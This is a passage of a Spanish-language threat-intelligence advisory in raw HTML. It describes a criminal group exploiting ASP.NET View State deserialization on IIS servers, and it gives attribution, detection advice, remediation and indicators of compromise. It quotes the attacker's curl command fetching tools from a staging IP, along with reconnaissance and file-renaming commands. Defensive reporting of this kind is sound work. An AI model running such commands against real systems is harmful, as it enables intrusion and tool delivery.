monospace;\">atm<\/span>:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">curl hxxp:\/\/195.123.240[.]233:443\/atm<\/span><\/li>\n<\/ul>\n<h4><a id=\"post-157356-_heading=h.8f32o4h8uxeh\"><\/a>TXPortMap<\/h4>\n<p>TGR-CRI-0045 utiliz\u00f3 <a href=\"https:\/\/github.com\/4dogs-cn\/TXPortMap\" target=\"_blank\" rel=\"noopener\">TxPortMap<\/a>, un esc\u00e1ner de puertos Golang y capturador de banners, ejecutado como <span style=\"font-family: 'courier new', courier, monospace;\">txp.exe<\/span> o <span style=\"font-family: 'courier new', courier, monospace;\">txpm.exe<\/span>. Se realiz\u00f3 para identificar servidores internos accesibles desde el host inicialmente comprometido (la cabeza de playa). Esto le permiti\u00f3 al atacante trazar un mapa de la red interna e identificar posibles objetivos de explotaci\u00f3n.<\/p>\n<h4><a id=\"post-157356-_heading=h.cx9195rcgnbk\"><\/a>Actividades de reconocimiento<\/h4>\n<p>Durante un per\u00edodo de 5\u00a0minutos, el actor de amenazas realiz\u00f3 un reconocimiento local y de la red a trav\u00e9s del ensamblaje de comandos shell, utilizando los siguientes comandos:<\/p>\n<p>En la Tabla 1, se muestran los comandos de reconocimiento.<\/p>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<td style=\"text-align: center; width: 27.0161%;\"><strong>Comando<\/strong><\/td>\n<td style=\"text-align: center; width: 72.3387%;\"><strong>Descripci\u00f3n<\/strong><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">tasklist<\/span><\/td>\n<td style=\"width: 72.3387%;\">Enumera todos los procesos en ejecuci\u00f3n en el sistema<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">ipconfig \/all<\/span><\/td>\n<td style=\"width: 72.3387%;\">Muestra la configuraci\u00f3n de red del sistema, incluida la direcci\u00f3n\u00a0IP, los servidores de nombres de dominio (DNS) y la direcci\u00f3n de control de acceso al medio (MAC)<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">quser<\/span><\/td>\n<td style=\"width: 72.3387%;\">Muestra informaci\u00f3n sobre los usuarios que iniciaron sesi\u00f3n<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">whoami \/all<\/span><\/td>\n<td style=\"width: 72.3387%;\">Muestra la identidad y la pertenencia a grupos del usuario actual<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">nltest \/domain_trusts<\/span><\/td>\n<td style=\"width: 72.3387%;\">Enumera los dominios de confianza<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">net user<\/span><\/td>\n<td style=\"width: 72.3387%;\">Enumera cuentas de usuario locales<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">systeminfo<\/span><\/td>\n<td style=\"width: 72.3387%;\">Muestra informaci\u00f3n detallada del sistema, incluida la versi\u00f3n del sistema operativo y los detalles del hardware<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 27.0161%;\"><span style=\"font-family: 'courier new', courier, monospace;\">dir &lt;user directories&gt;<\/span><\/td>\n<td style=\"width: 72.3387%;\">Enumera los archivos y los directorios de los directorios de usuario<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>Tabla\u00a01. Comandos de reconocimiento del actor de amenazas.<\/em><\/span><\/p>\n<h4><a id=\"post-157356-_heading=h.fqvndm7q85a3\"><\/a>Cambiar el nombre de los ejecutables cargados para evadir la defensa<\/h4>\n<p>El ensamblaje de carga de archivos a veces cargaba ejecutables con nombres de archivo de uno, dos o tres caracteres. No est\u00e1 claro si se trataba de una limitaci\u00f3n del propio ensamblaje o de una t\u00e9cnica de evasi\u00f3n deliberada por parte del actor de amenazas para subir archivos sin extensiones. Luego, el atacante utilizaba el ensamblaje de comandos shell para renombrar estos archivos con extensiones v\u00e1lidas dentro del directorio de almacenamiento, probablemente para que los archivos parecieran menos sospechosos.<\/p>\n<p>Algunos ejemplos de comandos utilizados para renombrar los archivos:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"cmd.exe\" \/c move c:\\windows\\temp\\111t\\tx2 c:\\windows\\temp\\111t\\txp.exe 2&gt;&amp;1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"cmd.exe\" \/c move c:\\windows\\temp\\111t\\tx c:\\windows\\temp\\111t\\txpm.exe 2&gt;&amp;1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">\"cmd.exe\" \/c move c:\\windows\\temp\\111t\\w c:\\windows\\temp\\111t\\wget.exe 2&gt;&amp;1<\/span><\/li>\n<\/ul>\n<p>Tras ejecutar las herramientas y el reconocimiento, el actor de amenazas eliminaba cualquier herramienta restante en el disco y el directorio\u00a0111t.<\/p>\n<h3><a id=\"post-157356-_heading=h.o9bunmxklwqv\"><\/a>Atribuci\u00f3n y objetivos<\/h3>\n<p>Bas\u00e1ndonos en los solapamientos de IoC, TTP y victimolog\u00eda, evaluamos con confianza media que TGR-CRI-0045 est\u00e1 vinculado a Gold Melody.<\/p>\n<p>TGR-CRI-0045 ha atacado organizaciones de Europa y Estados Unidos. El grupo parece seguir un enfoque oportunista coherente con su vector de ataque. Desde el inicio de la actividad identificada, el grupo ha atacado a organizaciones de las siguientes industrias, la mayor\u00eda de ellas con sede en EE.\u00a0UU:<\/p>\n<ul>\n<li>Servicios de inversi\u00f3n y valores<\/li>\n<li>Fabricaci\u00f3n: suministros para la construcci\u00f3n<\/li>\n<li>Fabricaci\u00f3n: refractarios de arcilla<\/li>\n<li>Fabricaci\u00f3n: instrumentos quir\u00fargicos\/m\u00e9dicos<\/li>\n<li>Comercio mayorista y minorista<\/li>\n<li>Alta tecnolog\u00eda<\/li>\n<li>Transporte y log\u00edstica<\/li>\n<li>Servicios de software preempaquetados<\/li>\n<li>Procesamiento y preparaci\u00f3n de datos<\/li>\n<li>Servicios financieros<\/li>\n<li>Revendedores de art\u00edculos\/mercanc\u00eda de segunda mano<\/li>\n<li>Servicios de programaci\u00f3n inform\u00e1tica a medida<\/li>\n<\/ul>\n<h3><a id=\"post-157356-_heading=h.2tyl5tfed28x\"><\/a>Implicaciones de la adopci\u00f3n por parte de la ciberdelincuencia de las t\u00e9cnicas avanzadas en IIS en la memoria y conclusiones clave para los equipos azules<\/h3>\n<h4><a id=\"post-157356-_heading=h.hawkwrxae1o\"><\/a>Acceso m\u00e1s sigiloso y tiempos de permanencia m\u00e1s largos<\/h4>\n<p>Las t\u00e9cnicas avanzadas en IIS en la memoria dificultan considerablemente la detecci\u00f3n. Sin la telemetr\u00eda adecuada, los ataques de deserializaci\u00f3n de View State son pr\u00e1cticamente invisibles. Normalmente, la remediaci\u00f3n se produce solo cuando se generan nuevas claves de m\u00e1quina o se da de baja el servidor. Esto permite a los actores de amenazas, en particular a los IAB, mantener un acceso a largo plazo y de bajo impacto a un conjunto de sistemas comprometidos.<\/p>\n<h4><a id=\"post-157356-_heading=h.y6fl0zidcjoj\"><\/a>Telemetr\u00eda para solicitudes POST: Cubrir una posible debilidad<\/h4>\n<p>Aunque las cargas \u00fatiles de deserializaci\u00f3n de View State pueden entregarse a trav\u00e9s de un par\u00e1metro URI en una solicitud GET, los atacantes suelen incluir el par\u00e1metro <span style=\"font-family: 'courier new', courier, monospace;\">__VIEWSTATE<\/span> en una solicitud POST. Debido al tama\u00f1o y a la potencial sensibilidad, las solicitudes POST casi nunca se registran en servidores IIS, proxies, balanceadores de carga o dispositivos de seguridad.<\/p>\n<p>Considere implementar soluciones que filtren condicionalmente y registren las solicitudes POST. Las opciones incluyen lo siguiente:<\/p>\n<ul>\n<li>Reglas de registro personalizadas<\/li>\n<li>Marcos de observabilidad web<\/li>\n<li>Agentes de detecci\u00f3n y respuesta de endpoints<\/li>\n<li>Dispositivos de seguridad de la red<\/li>\n<\/ul>\n<h4><a id=\"post-157356-_heading=h.6xekv7op28lj\"><\/a>Una posible avenida de detecci\u00f3n: registros de eventos de Windows<\/h4>\n<p>Windows puede registrar los fallos de deserializaci\u00f3n de View State como Event\u00a0ID\u00a01316 en el registro de eventos de ASP.NET. Revise estos registros y compruebe si hay binarios maliciosos en las cargas \u00fatiles de View State fallidas. Los View States que contienen binarios o datos cifrados (cuando el cifrado de View State est\u00e1 desactivado) son altamente sospechosos.<\/p>\n<h4><a id=\"post-157356-_heading=h.ywrpgqn4oynu\"><\/a>Exploits de un solo intento: un enfoque limitado<\/h4>\n<p>TGR-CRI-0045 utiliza un enfoque simplista para la explotaci\u00f3n de View State, cargando directamente un \u00fanico ensamblaje sin estado. Cada ejecuci\u00f3n del comando requiere volver a explotar y volver a cargar el ensamblaje (por ejemplo, ejecutar el ensamblaje de carga de archivos varias veces). Lo mismo ocurre con la ejecuci\u00f3n de un nuevo listado de directorios o de un nuevo proceso. El ensamblaje, los par\u00e1metros y el c\u00f3digo de exploit se env\u00edan y ejecutan, y los resultados se devuelven a trav\u00e9s de una \u00fanica solicitud. Este enfoque de \u00fanico intento limita la capacidad del atacante para interactuar con el sistema comprometido.<\/p>\n<p>Incluso si TGR-CRI-0045 no implementa un shell web persistente (respaldado por el disco o la memoria) a trav\u00e9s de la explotaci\u00f3n de View State, los defensores deben tener en cuenta lo siguiente:<\/p>\n<ul>\n<li><strong>Cada exploit es una oportunidad<\/strong>\n<ul>\n<li>Cada intento de exploit ofrece a los atacantes la oportunidad de ejecutar una carga \u00fatil que posiblemente sea invisible para las herramientas de seguridad y supervisi\u00f3n existentes.<\/li>\n<\/ul>\n<\/li>\n<li><strong>La ausencia de un shell web no significa que no haya vulneraci\u00f3n<\/strong>\n<ul>\n<li>La ausencia de un shell web no indica que el servidor no haya sido explotado.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Es necesaria una reexplotaci\u00f3n<\/strong>\n<ul>\n<li>TGR-CRI-0045 deben explotar el servidor cada vez que desee ejecutar una carga \u00fatil, a menos que cargue un m\u00f3dulo que sea persistente entre solicitudes.<\/li>\n<\/ul>\n<\/li>\n<li><strong>La explotaci\u00f3n con estado es posible<\/strong>\n<ul>\n<li>Aunque TGR-CRI-0045 implementa m\u00f3dulos sin estado, existen casos documentados de actores de amenazas que implementaron ensamblajes .NET en IIS con estado tras la explotaci\u00f3n. Se basan en datos almacenados en variables ASP.NET y .NET que son accesibles a la cadena de procesamiento web y persistentes entre solicitudes. <a href=\"https:\/\/www.crowdstrike.com\/en-us\/blog\/falcon-overwatch-detects-iceapple-framework\/\" target=\"_blank\" rel=\"noopener\">El informe de CrowdStrike sobre IceApple<\/a> es un ejemplo de este marco.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h4><a id=\"post-157356-_heading=h.t4c2aaz16luf\"><\/a>T\u00e9cnicas de MITRE ATT&amp;CK<\/h4>\n<ul>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1036\/005\/\" target=\"_blank\" rel=\"noopener\">T1036.005<\/a> - Enmascaramiento: coincidencia de nombre o ubicaci\u00f3n leg\u00edtimos (<span style=\"font-family: 'courier new', courier, monospace;\">updf<\/span> binario)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1036\/010\/\" target=\"_blank\" rel=\"noopener\">T1036.010<\/a> - Enmascaramiento: nombre de cuenta enmascarado<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1046\/\" target=\"_blank\" rel=\"noopener\">T1046<\/a> - Descubrimiento de servicios de red (TxPortMap)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1059\/003\/\" target=\"_blank\" rel=\"noopener\">T1059.003<\/a> - Int\u00e9rprete de comandos y secuencias: shell de comandos de Windows (<span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span>)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1071\/001\/\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a> - Protocolo de capa sin aplicaci\u00f3n: protocolos web (View State de HTTP)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1082\/\" target=\"_blank\" rel=\"noopener\">T1082<\/a> - Descubrimiento de informaci\u00f3n del sistema (<span style=\"font-family: 'courier new', courier, monospace;\">systeminfo, ipconfig<\/span>)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1105\/\" target=\"_blank\" rel=\"noopener\">T1105<\/a> - Transferencia de herramientas de entrada (<span style=\"font-family: 'courier new', courier, monospace;\">wget, curl<\/span>)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1134\/001\/\" target=\"_blank\" rel=\"noopener\">T1134.001<\/a> - Manipulaci\u00f3n del token de acceso: suplantaci\u00f3n\/robo de tokens (exploit GodPotato en <span style=\"font-family: 'courier new', courier, monospace;\">updf<\/span>)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1136\/001\/\" target=\"_blank\" rel=\"noopener\">T1136.001<\/a> - Creaci\u00f3n de una cuenta: cuenta local (<span style=\"font-family: 'courier new', courier, monospace;\">updf<\/span>)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1190\/\" target=\"_blank\" rel=\"noopener\">T1190<\/a> - Explotaci\u00f3n de la aplicaci\u00f3n de cara al p\u00fablico (deserializaci\u00f3n de View State)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1217\/\" target=\"_blank\" rel=\"noopener\">T1217<\/a> - Descubrimiento de informaci\u00f3n del navegador<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1505\/003\/\" target=\"_blank\" rel=\"noopener\">T1505.003<\/a> - Shell web (posible modificaci\u00f3n de <span style=\"font-family: 'courier new', courier, monospace;\">web.config<\/span>)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1572\/\" target=\"_blank\" rel=\"noopener\">T1572<\/a> - T\u00fanel de protocolo (si se utiliza, se basa en funciones importadas en el m\u00f3dulo de descarga de archivos no recuperados)<\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1587\/001\/\" target=\"_blank\" rel=\"noopener\">T1587.001<\/a> - Malware<\/li>\n<\/ul>\n<h3><a id=\"post-157356-_heading=h.m79envqmfvf3\"><\/a>Orientaci\u00f3n sobre reparaci\u00f3n y refuerzo<\/h3>\n<h4><a id=\"post-157356-_heading=h.sjpu2blmlgqj\"><\/a>Claves de m\u00e1quina<\/h4>\n<p>Las claves de m\u00e1quina en IIS son componentes criptogr\u00e1ficos fundamentales que se usan para autenticar y cifrar datos cliente-servidor. Son esenciales para los exploits de deserializaci\u00f3n de View State.<\/p>\n<p>Si sospecha que se trata de un exploit de deserializaci\u00f3n de View State, compruebe lo siguiente en su aplicaci\u00f3n de IIS:<\/p>\n<ul>\n<li>No tener activado el c\u00f3digo de autenticaci\u00f3n de mensajes (MAC) de State View.\n<ul>\n<li>Se puede hacer al buscar <a href=\"https:\/\/devblogs.microsoft.com\/dotnet\/farewell-enableviewstatemac\/\" target=\"_blank\" rel=\"noopener\"><span style=\"font-family: 'courier new', courier, monospace;\">&lt;pages enableViewStateMac=\"False\" \/&gt;<\/span><\/a> en <span style=\"font-family: 'courier new', courier, monospace;\">web.config<\/span> y <span style=\"font-family: 'courier new', courier, monospace;\">machine.config<\/span>.<\/li>\n<\/ul>\n<\/li>\n<li>Usar de una clave de m\u00e1quina comprometida.<\/li>\n<li>Que le hayan robado la clave de m\u00e1quina.<\/li>\n<\/ul>\n<p>A continuaci\u00f3n, se ofrece orientaci\u00f3n para cuatro posibles casos:<\/p>\n<ul>\n<li>Si la firma MAC de View State est\u00e1 desactivada, act\u00edvela despu\u00e9s de comprobar la estabilidad de la aplicaci\u00f3n.<\/li>\n<li>Si la firma MAC de View State est\u00e1 activada y utiliza claves de m\u00e1quina est\u00e1ticas, considere que las claves est\u00e1n comprometidas. Corr\u00edjalas siguiendo las directrices de <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/02\/06\/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys\/\" target=\"_blank\" rel=\"noopener\">Microsoft<\/a> y <a href=\"https:\/\/zeroed.tech\/blog\/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited\/\" target=\"_blank\" rel=\"noopener\">Zeroed.Tech<\/a>.<\/li>\n<li>Si la firma MAC de View State est\u00e1 activada y utiliza claves de m\u00e1quina est\u00e1ticas encontradas en listas comprometidas conocidas (por ejemplo, <a href=\"https:\/\/github.com\/NotSoSecure\/Blacklist3r\/blob\/master\/MachineKey\/AspDotNetWrapper\/AspDotNetWrapper\/Resource\/MachineKeys.txt\" target=\"_blank\" rel=\"noopener\">Blacklist3r<\/a>): restablezca las claves siguiendo las instrucciones de Microsoft anteriores, asegur\u00e1ndose de que la nueva clave no est\u00e9 en la lista de denegaci\u00f3n.<\/li>\n<li>Si la firma MAC de View State est\u00e1 activada y utiliza claves de m\u00e1quina din\u00e1micas, considere que las claves est\u00e1n comprometidas y regen\u00e9relas en Server Manager de IIS.<\/li>\n<\/ul>\n<p>Recomendamos encarecidamente leer <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/02\/06\/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys\/\" target=\"_blank\" rel=\"noopener\">la gu\u00eda de Microsoft sobre reparaci\u00f3n<\/a> para este tema.<\/p>\n<h2><a id=\"post-157356-_heading=h.oefkwdpqn53f\"><\/a>Conclusi\u00f3n<\/h2>\n<p>Esta investigaci\u00f3n revela c\u00f3mo TGR-CRI-0045 aprovecha las t\u00e9cnicas de IIS en la memoria para tener acceso persistente. La explotaci\u00f3n de las vulnerabilidades de deserializaci\u00f3n de View State de ASP.NET a trav\u00e9s de claves de m\u00e1quina expuestas permite tener una presencia m\u00ednima en el disco y lograr el acceso a largo plazo.<\/p>\n<p>Los objetivos oportunistas del grupo y el continuo desarrollo de herramientas ponen de manifiesto la necesidad de que las organizaciones prioricen la identificaci\u00f3n y la reparaci\u00f3n de las claves de m\u00e1quina comprometidas, tal y como se\u00f1ala Microsoft. La naturaleza de intento \u00fanico del exploit y las limitaciones de la telemetr\u00eda tradicional muestran que se necesita un registro condicional de solicitudes POST y un an\u00e1lisis cuidadoso del registro de eventos ASP.NET. Estas medidas contribuyen a la detecci\u00f3n y la respuesta cuando las soluciones para endpoints carecen de visibilidad de tales ataques.<\/p>\n<h3><a id=\"post-157356-_heading=h.npmu4fduh3g\"><\/a>Protecci\u00f3n y mitigaci\u00f3n de Palo Alto Networks<\/h3>\n<p>Los clientes de Palo Alto Networks est\u00e1n mejor protegidos frente a las amenazas mencionadas gracias a los siguientes productos:<\/p>\n<ul>\n<li>Los modelos de aprendizaje autom\u00e1tico y las t\u00e9cnicas de an\u00e1lisis de <a href=\"https:\/\/docs.paloaltonetworks.com\/wildfire\" target=\"_blank\" rel=\"noopener\">Advanced WildFire<\/a> se han revisado y actualizado a la luz de los indicadores compartidos en esta investigaci\u00f3n.<\/li>\n<li><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a> y <a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\">XSIAM <\/a>proporciona protecciones listas para usar para exploits de deserializaci\u00f3n IIS con el m\u00f3dulo de protecci\u00f3n IIS.<\/li>\n<\/ul>\n<h4><a id=\"post-157356-_heading=h.1e79vc9hjmm\"><\/a>Protecci\u00f3n de XDR y XSIAM en IIS<\/h4>\n<p>El m\u00f3dulo Protecci\u00f3n de Cortex\u00a0XDR y XSIAM en IIS cuenta con capacidades tanto para detectar como para prevenir la deserializaci\u00f3n del View State, como se discute en este blog. Este m\u00f3dulo est\u00e1 activado por defecto.<\/p>\n<p>Si cree que puede haber resultado vulnerado o tiene un problema urgente, p\u00f3ngase en contacto con el <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">equipo de respuesta ante incidentes de Unit\u00a042<\/a> o llame al:<\/p>\n<ul>\n<li>Norteam\u00e9rica: llamada gratuita: +1\u00a0(866)\u00a0486-4842 (866.4.UNIT42)<\/li>\n<li>Reino Unido: +44.20.3743.3660<\/li>\n<li>Europa y Oriente Medio: +31.20.299.3130<\/li>\n<li>Asia: +65.6983.8730<\/li>\n<li>Jap\u00f3n: +81.50.1790.0200<\/li>\n<li>Australia: +61.2.4062.7950<\/li>\n<li>India: 00080005045107<\/li>\n<\/ul>\n<p>Palo Alto Networks ha compartido estos resultados con nuestros compa\u00f1eros de Cyber Threat Alliance (CTA). Los miembros de CTA utilizan esta inteligencia para implementar r\u00e1pidamente medidas de protecci\u00f3n para sus clientes y desarticular sistem\u00e1ticamente a los ciberdelincuentes. Obtenga m\u00e1s informaci\u00f3n sobre <a href=\"https:\/\/www.cyberthreatalliance.org\" target=\"_blank\" rel=\"noopener\">Cyber Threat Alliance<\/a>.<\/p>\n<h2><a id=\"post-157356-_heading=h.8bcmrd3xlgnb\"><\/a>Indicadores de vulneraci\u00f3n<\/h2>\n<p><strong>Hashes de ensamblajes .NET reflexivos: <\/strong><\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">106506ebc7156be116fe5d2a4d662917ddbbfb286007b6ee7a2b01c9536b1ee4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">87bd7e24af5f10fe1e01cfa640ce26e9160b0e0e13488d7ee655e83118d16697<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">55656f7b2817087183ceedeb4d9b78d3abee02409666bffbe180d6ea87ee20fb<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">18a90b3702776b23f87738b26002e013301f60d9801d83985a57664b133cadd1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d5d0772cb90d54ac3e3093c1ea9fcd7b878663f7ddd1f96efea0725ce47d46d5<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">b3c085672ac34f1b738879096af5fcd748953116e319367e6e371034366eaeca<\/span><\/li>\n<li><span style=\"font-family: georgia, palatino, serif;\">Tama\u00f1os de archivo: varios<\/span><\/li>\n<li><span style=\"font-family: georgia, palatino, serif;\">Tipos de archivo: ejecutables (DLL)<\/span><\/li>\n<li><span style=\"font-family: georgia, palatino, serif;\">Descripci\u00f3n del archivo: hashes de ensamblajes compilados observados<\/span><\/li>\n<li><span style=\"font-family: georgia, palatino, serif;\">M\u00e9todo de ejecuci\u00f3n: cargado por IIS al deserializar<\/span><\/li>\n<\/ul>\n<p><strong>Las herramientas de postexplotaci\u00f3n se descargan en el disco:<\/strong><\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d4bfaf3fd3d3b670f585114b4619aaf9b10173c5b1e92d42be0611b6a9b1eff2<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">c1f66cadc1941b566e2edad0d1f288c93bf060eef383c79638306638b6cefdf8<\/span><\/li>\n<li>Tipos de archivos: Ejecutables<\/li>\n<li>Descripci\u00f3n del archivo: <a href=\"https:\/\/github.com\/4dogs-cn\/TXPortMap\" target=\"_blank\" rel=\"noopener\">TxPortMap<\/a> llamado <span style=\"font-family: 'courier new', courier, monospace;\">txpm.exe<\/span> o <span style=\"font-family: 'courier new', courier, monospace;\">txp.exe<\/span><\/li>\n<li>M\u00e9todo de ejecuci\u00f3n: <span style=\"font-family: 'courier new', courier, monospace;\">cmd\u00a0\/c<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">52a72f899991506d2b1df958dd8736f7baa26592d664b771c3c3dbaef8d3114a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d3767be11d9b211e74645bf434c9a5974b421cb96ec40d856f4b232a5ef9e56d<\/span><\/li>\n<li>Tipos de archivos: Ejecutables<\/li>\n<li>Descripci\u00f3n del archivo: ejecutables .NET llamados updf.exe o up que utilizan la t\u00e9cnica de escalada de privilegios GodPotato para elevarse y crear un nuevo administrador local o ejecutar una instancia de <span style=\"font-family: 'courier new', courier, monospace;\">cmd\u00a0\/c.<\/span><\/li>\n<li>M\u00e9todo de ejecuci\u00f3n: <span style=\"font-family: 'courier new', courier, monospace;\">cmd\u00a0\/c<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">f368ec59fb970cc23f955f127016594e2c72de168c776ae8a3f9c21681860e9<\/span>c<\/li>\n<li>Tipo de archivo: ELF<\/li>\n<li>Descripci\u00f3n del archivo: permite a un usuario ejecutar comandos o binarios como usuario root en hosts Linux. Descargado mediante curl.<\/li>\n<\/ul>\n<p><strong>Direcciones IP de explotaci\u00f3n:<\/strong><\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">67.43.234[.]96<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">213.252.232[.]237<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">98.159.108[.]69<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">190.211.254[.]95<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">109.176.229[.]89<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">169.150.198[.]91<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">194.5.82[.]11<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">138.199.21[.]243<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">194.114.136[.]95<\/span><\/li>\n<\/ul>\n<p>Se observaron cargas \u00fatiles de explotaci\u00f3n que conten\u00edan par\u00e1metros <span style=\"font-family: 'courier new', courier, monospace;\">__VIEWSTATE<\/span> maliciosos desde las siguientes direcciones\u00a0IP entre octubre de 2024 y febrero de 2025. El tr\u00e1fico HTTP\/s de estas direcciones dirigido a servidores IIS debe ser interrogado.<\/p>\n<p><strong>Herramientas de preparaci\u00f3n de infraestructura para postexplotaci\u00f3n:<\/strong><\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">195.123.240[.]233<\/span><\/li>\n<\/ul>\n<p>Entre enero y febrero de 2025, el actor de amenazas extrajo herramientas de esta direcci\u00f3n a trav\u00e9s de curl en Windows.<\/p>\n<h2><a id=\"post-157356-_heading=h.kwlo77hg74cn\"><\/a>Recursos adicionales<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/02\/06\/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys\/\" target=\"_blank\" rel=\"noopener\">Code injection attacks using publicly disclosed ASP.NET machine keys (Ataques de inyecci\u00f3n de c\u00f3digo con claves de m\u00e1quina ASP.NET divulgadas p\u00fablicamente) | <\/a>Microsoft Security Blog<\/li>\n<li><a href=\"https:\/\/support.microsoft.com\/en-us\/topic\/resolving-view-state-message-authentication-code-mac-errors-6c0e9fd3-f8a8-c953-8fbe-ce840446a9f3#ID0EDH\" target=\"_blank\" rel=\"noopener\">Resolving view state message authentication code (MAC) errors (Resoluci\u00f3n de errores de c\u00f3digo de autenticaci\u00f3n de mensajes (MAC) de View State) - Microsoft Support<\/a><\/li>\n<li><a href=\"https:\/\/learn.microsoft.com\/en-us\/previous-versions\/dotnet\/articles\/ms972976(v=msdn.10)?redirectedfrom=MSDN\" target=\"_blank\" rel=\"noopener\">Understanding ASP.NET View State (Comprender View State de ASP.NET)<\/a> - Microsoft<\/li>\n<li><a href=\"https:\/\/zeroed.tech\/blog\/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited\" target=\"_blank\" rel=\"noopener\">View State, The unpatchable IIS forever day being actively exploited (View State, el d\u00eda cero no parcheable de IIS que est\u00e1 siendo explotado activamente)<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/pwntester\/ysoserial.net\/blob\/master\/ysoserial\/Generators\/XamlAssemblyLoadFromFileGenerator.cs\" target=\"_blank\" rel=\"noopener\">XamlAssemblyLoadFromFileGenerator.cs<\/a> - GitHub<\/li>\n<li><a href=\"https:\/\/github.com\/pwntester\/ysoserial.net\/blob\/master\/ysoserial\/Plugins\/ViewStatePlugin.cs\" target=\"_blank\" rel=\"noopener\">ViewStatePlugin.cs<\/a> - GitHub<\/li>\n<li><a href=\"https:\/\/github.com\/NotSoSecure\/Blacklist3r\/blob\/master\/MachineKey\/AspDotNetWrapper\/AspDotNetWrapper\/Resource\/MachineKeys.txt\" target=\"_blank\" rel=\"noopener\">GitHub - MachineKeys.txt<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/microsoft\/mstic\/blob\/master\/RapidReleaseTI\/MachineKeys.csv\" target=\"_blank\" rel=\"noopener\">mstic\/RapidReleaseTI\/MachineKeys.csv at master<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/BeichenDream\/GodPotato\" target=\"_blank\" rel=\"noopener\">GitHub - BeichenDream\/GodPotato<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/4dogs-cn\/TXPortMap\" target=\"_blank\" rel=\"noopener\">GitHub - 4dogs-cn\/TXPortMap: Esc\u00e1ner de puertos e identificador de banners de TianXiang<\/a><\/li>\n<li><a 